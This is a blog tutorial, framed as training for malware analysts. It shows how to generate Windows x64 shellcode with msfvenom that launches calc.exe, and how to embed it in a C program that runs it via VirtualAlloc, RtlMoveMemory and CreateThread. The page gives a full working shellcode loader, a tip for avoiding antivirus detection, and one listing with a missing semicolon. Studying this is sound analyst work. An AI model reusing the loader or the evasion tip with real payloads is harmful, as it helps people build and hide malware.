StackZero
  • Homepage
  • Categories
    • Basics
    • Cryptography and Privacy
    • Ethical Hacking
      • Web Security
      • Network Security
    • Reverse Engineering
      • Malware Analysis
  • Contacts
No Result
View All Result
StackZero
No Result
View All Result

How to embed shellcode payload into an executable

September 30, 2021
in Malware Analysis, Reverse Engineering
0 0
Embed shellcode into an executable
0
SHARES
57
VIEWS
Share on FacebookShare on Twitter

A good malware analyst has to know how to embed shellcode payload into an executable in just a few minutes, which is the best way to recognize it during analysis.

Trojans or, more generally, some malware often embed shellcode within their code, in particular, some attackers can hide it within sections:

  • .text
  • .data
  • .rsrc

In this article, we will see how it is possible to do this, in practice, with regard to the first two sections.
The code will only have an explanatory function, a malware developer will pay a lot more attention for example to avoid being “discovered” by an anti-malware.

Table of Contents

  • Prerequisites
  • Shellcode Generation
  • Embed shellcode payload into an executable
  • Further Readings

Prerequisites

To begin with, we need a Windows machine and a Linux machine.
For this purpose, I will use two virtual machines in VirtualBox.
– Kali Linux
– Flare VM (Windows 7 Ultimate x64)

Shellcode Generation

The malware we are going to write is totally harmless, and the final result will be simply the launch of calc.exe (usually for proof of concept in windows we can launch either calc.exe or notepad.exe).

The first step is to generate the shellcode, for this we will use msfvenom with our Kali Linux machine.

  • We open a terminal and type the following command:
$ msfvenom -p windows/x64/exec --format c CMD=calc.exe EXITFUNC=thread

Let’s analyze the options:

  • -p windows/x64/exec indicates that we are asking to launch the exec payload.
  • –format c asks that the shellcode is formatted for the c language.
  • CMD=’calc.exe’ is a payload option and asks what command to run.
  • EXITFUNC=thread is another payload option, in this case, it is the function to call at the end of the execution of the shellcode, specifying ‘thread’ will execute ‘ExitThread’.

This command will output the following shellcode:

unsigned char buf[] =
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";

Now save the output and move it to your Windows machine on our VisualStudio editor.

Embed shellcode payload into an executable

The first step includes importing the necessary libraries:

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

Next, we will declare the variables we need and initialize the array containing the shellcode.

void * shellcode_alloc_mem ;

HANDLE threadHandle;


unsigned char shellcode[]=
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";

unsigned int shellcode_len = sizeof(shellcode)/sizeof(unsigned char);

After all these steps, we will allocate an area of memory in which to insert the shellcode.
The prototype of the function is this:

LPVOID VirtualAlloc(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);

We will then let the system decide where to allocate the bytes corresponding to the length of the shellcode with all permissions.

shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

Those functions/macros can help us:

  • RtlMoveMemory.
  • CreateThread.
  • WaitForSingleObject.

The code needs a little comment, RtlMoveMemory is quite simple, it takes as parameters source, destination and length, and then moves the specified number of bytes from the source to the destination.
CreateThread receives as a third parameter the routine, which will be our shellcode, all cast to LPTHREAD_START_ROUTINE.
WaitForSingleObject instead waits for the end of the thread.

I don’t want to add more elements, but before showing the complete code I wanted to specify that normally an antivirus will label as suspicious threads that have full permissions, so what malware developers usually do is to allocate with permissions PAGE_READWRITE, copy the shellcode and then use the VirtualProtect function and change the permissions to PAGE_EXECUTE_READ.

But now let’s see the complete code:

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
    void * shellcode_alloc_mem ;

    HANDLE threadHandle;


unsigned char shellcode[]=
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";

    unsigned int shellcode_len = sizeof(shellcode)/sizeof(unsigned char);
    
    shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

    getchar();
    if(shellcode_alloc_mem )
    {   
        RtlMoveMemory(shellcode_alloc_mem, shellcode, shellcode_len);
        threadHandle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode_alloc_mem, 0, 0, 0);
        WaitForSingleObject(threadHandle, INFINITE);
    }


}

In this case, our shellcode is inside the .text section, to make it in the .data section simply move our variable to global, exactly as I show in this example.

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>


unsigned char shellcode[]=
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd"

int main(void)
{
    void * shellcode_alloc_mem ;

    HANDLE threadHandle;

;

    unsigned int shellcode_len = sizeof(shellcode)/sizeof(unsigned char);
    
    shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

    getchar();
    if(shellcode_alloc_mem )
    {   
        RtlMoveMemory(shellcode_alloc_mem, shellcode, shellcode_len);
        threadHandle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode_alloc_mem, 0, 0, 0);
        WaitForSingleObject(threadHandle, INFINITE);
    }


}

And finally, let’s see the command to compile, to be run in the x64 Native Tools command prompt.

>cl  /EHsc <FILENAME.cpp>

At this point, when running, you should have a paused terminal, and on key pressing, a thread will be launched and the shellcode executed.
I suggest analysing the behaviour using a debugger such as xdbg.

Further Readings

If you found it interesting to read, I recommend the following articles.

  • How to write a shellcode runner for your malware analysis
  • How a malware evades analysis – 2 simple techniques in practice
How malware evasion works – 2 simple techniques in practice
Trending
How malware evasion works – 2 simple techniques in practice

Tags: cc++kali linuxmsfvenomsectionsshellcodewindowswindows api
Next Post

How to easily change your Windows Mac Address in Python

Next Post
Mac changer in python

How to easily change your Windows Mac Address in Python

You might also like

Hack File Inclusion in DVWA: A Full Walkthrough

Hack File Inclusion in DVWA: A Full Walkthrough

January 18, 2023
How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction.

How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction.

December 15, 2022
What is unrestricted file upload vulnerability? And How to exploit it on DVWA!

What is unrestricted file upload vulnerability? And How to exploit it on DVWA!

November 29, 2022
How To Exploit CSRF In DVWA

How To Exploit CSRF In DVWA

November 23, 2022
CSRF intro featured

CSRF Introduction: What you need to know!

November 15, 2022
Bruteforce attack

How to Brute Force DVWA login with Python

November 3, 2022

StackZero

StackZero is a technical coding blog that focuses on cybersecurity. It mainly offers articles and tutorials that teach readers how to write security tools.
The blog covers a wide range of topics, from the basics of cryptography to the more advanced topics of exploitation and reverse engineering.

Tags

application security blind sqli blind sql injection bruteforce c certification command injection csrf csrf attack cybersecurity dom-based xss dvwa ethical-hacking exploitation file inclusion file upload hacking injection javascript kali linux local file inclusion malware malware analysis network-security penetration testing pentesting lab python reflected xss registry remote file inclusion security shellcode sql sqli sql injection stored xss virtual machine vulnerable application web application security web exploitation web security windows windows api windows virtual machine xss
  • Contacts
  • HomePage
  • Privacy Policy
  • Terms and Conditions

No Result
View All Result
  • Homepage
  • Categories
    • Basics
    • Cryptography and Privacy
    • Ethical Hacking
      • Web Security
      • Network Security
    • Reverse Engineering
      • Malware Analysis
  • Contacts

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In